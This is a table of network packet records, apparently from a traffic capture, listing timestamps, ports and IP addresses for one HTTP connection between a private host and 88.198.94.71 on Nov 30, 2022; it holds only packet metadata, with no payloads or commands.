Nov 30, 2022 00:22:31.921020031 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.921053886 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.921081066 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.923904896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.923928022 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.924000978 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.925662994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925685883 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925705910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925726891 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925748110 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925766945 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.925767899 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925790071 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925803900 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.925810099 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925821066 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.925836086 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925846100 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.925857067 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925868034 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.925878048 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925884962 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.925899029 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925905943 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.925916910 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.925920010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925941944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925961018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.925967932 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.925981998 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926002026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926002026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926022053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926023006 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926043034 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926053047 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926063061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926075935 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926083088 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926104069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926110029 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926124096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926145077 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926151991 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926167011 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926182985 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926187038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926204920 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926209927 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926229954 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926238060 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926251888 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926264048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926273108 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926286936 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926291943 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926305056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926314116 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926326036 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926333904 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926340103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926350117 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926358938 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926372051 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926378965 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926393032 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926393032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926414967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926419020 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926433086 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926435947 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926456928 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926476955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926496983 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926511049 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926516056 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926521063 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926531076 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926538944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926558971 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926562071 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926579952 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926579952 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926599979 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926620007 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926625013 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926640987 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926651001 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926661015 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926675081 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926681995 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926693916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926702976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926712990 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926726103 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926747084 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926760912 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926763058 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926774025 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926780939 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926800966 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926806927 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926822901 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926841974 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926845074 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926862001 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926892042 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926897049 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926908970 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926918030 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926938057 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926955938 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926965952 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926975965 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.926984072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.926995993 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927009106 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927016020 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927027941 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927036047 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927047014 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927054882 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927073956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927093029 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927113056 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927131891 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927139044 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927139044 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927139997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927139997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927155018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927175045 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927175999 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927196026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927196980 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927211046 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927217007 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927226067 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927237988 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927243948 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927257061 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927258015 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927278996 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927298069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927299023 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927318096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927323103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927337885 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927347898 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927357912 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927364111 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927377939 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927381039 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927395105 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927397013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927418947 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927437067 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927437067 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927458048 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927465916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927475929 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927489042 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927495956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927505016 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927516937 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927522898 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927536964 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927541018 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927556038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927556992 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927577019 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927594900 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927596092 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927617073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927622080 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927635908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927648067 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927656889 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927664042 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927678108 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927683115 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927694082 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927697897 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927716017 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927720070 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927740097 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927757025 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927757978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927773952 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927778959 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927798986 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927798986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927819014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927820921 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927834988 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927839994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927859068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927876949 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927886009 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927896023 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927913904 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927920103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927933931 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927937984 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927953959 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927963972 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927973986 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927978992 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.927994967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.927998066 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928014040 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928033113 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928052902 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928059101 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928073883 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928088903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928093910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928112984 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928113937 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928132057 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928138971 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928153038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928160906 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928174019 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928181887 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928193092 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928199053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928212881 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928214073 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928234100 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928234100 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928251982 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928255081 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928272009 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928276062 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928291082 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928296089 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928313971 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928317070 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928333044 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928337097 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928354979 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928355932 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928375959 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928375959 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928395033 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928397894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928414106 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928417921 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928436995 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928437948 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928457022 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928462982 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928477049 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928478956 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928497076 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928498030 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928518057 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928519011 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928536892 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928539038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928558111 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928570032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928589106 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928590059 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928605080 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928610086 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928628922 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928628922 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928647995 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928648949 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928667068 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928669930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928688049 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928692102 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928709030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928713083 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928729057 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928735018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928752899 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928754091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928776026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928776026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928793907 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928796053 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928817034 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928822041 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928838015 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928838015 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928854942 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928858042 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928877115 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928879976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928895950 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928901911 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928920984 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928921938 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928939104 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.928941965 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928957939 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928973913 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.928989887 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929003954 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929019928 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929033995 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929053068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929066896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929085970 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929105997 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929111958 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.929126978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929145098 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929163933 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.929164886 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929186106 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929193974 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.929205894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929208040 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.929224968 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929234982 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.929244995 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929250002 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.929265976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929270029 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.929282904 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.929286957 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929306030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.929307938 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929327011 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.929330111 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.929351091 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.929369926 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.942759037 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.943803072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.944559097 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.944647074 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.944715977 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.944766998 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.944899082 CET	80	49710	88.198.94.71	192.168.2.5
